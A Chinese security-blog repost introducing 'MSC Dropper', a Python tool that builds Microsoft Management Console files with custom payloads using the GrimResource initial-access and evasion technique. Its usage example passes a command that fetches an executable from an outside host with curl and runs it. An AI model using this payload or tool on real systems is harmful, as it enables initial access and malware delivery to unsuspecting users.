自定义恶意payload 的 MSC(Microsoft 管理控制台)文件以供任意执行

admin 2024年7月30日23:21:14评论26 views字数 898阅读2分59秒阅读模式

自定义恶意payload 的 MSC(Microsoft 管理控制台)文件以供任意执行

MSC Dropper 工具

MSC Dropper 是一个 Python 脚本,旨在自动创建带有可自定义有效负载的 MSC(Microsoft 管理控制台)文件,以实现任意执行。此工具利用了 Elastic Security Labs 的 Samir (@SBousseaden) 发现的一种方法,称为 #GrimResource,该方法有助于通过 进行初始访问和规避mmc.exe。

概述

该脚本允许用户生成可在 Microsoft 管理控制台环境中执行任意命令或脚本的 MSC 文件。此功能对于安全研究和测试环境特别有用。

特征

  • 自动 MSC 文件生成:创建嵌入指定命令或脚本的 MSC 文件。

  • 有效载荷定制:定制有效载荷以执行任何mmc.exe可以调用的命令或脚本。

  • 命令行界面:简单的命令行界面,用于快速生成 MSC 文件。

安装

克隆存储库:

git clone https://github.com/ZERODETECTION/MSC_Dropper.git

用法

  • 生成 MSC 文件

要使用特定命令或脚本生成 MSC 文件:

python msc_dropper.py template1.msc out.msc "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"

替换"cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"为您要执行的命令或脚本。确保命令格式正确,可以在 Windows 环境中运行mmc.exe。

自定义有效载荷

您可以直接在文件中自定义有效载荷template1.msc或修改脚本以自动生成更复杂的有效载荷。

致谢

Elastic Security Labs 的 Samir (@SBousseaden) 发现了涉及的初始访问和逃避方法mmc.exe。

https://github.com/ZERODETECTION/MSC_Dropper

GrimResource - 用于初始访问和规避的 Microsoft 管理控制台

原文始发于微信公众号(Ots安全):自定义恶意payload 的 MSC(Microsoft 管理控制台)文件以供任意执行

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月30日23:21:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   自定义恶意payload 的 MSC(Microsoft 管理控制台)文件以供任意执行https://cn-sec.com/archives/2995556.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息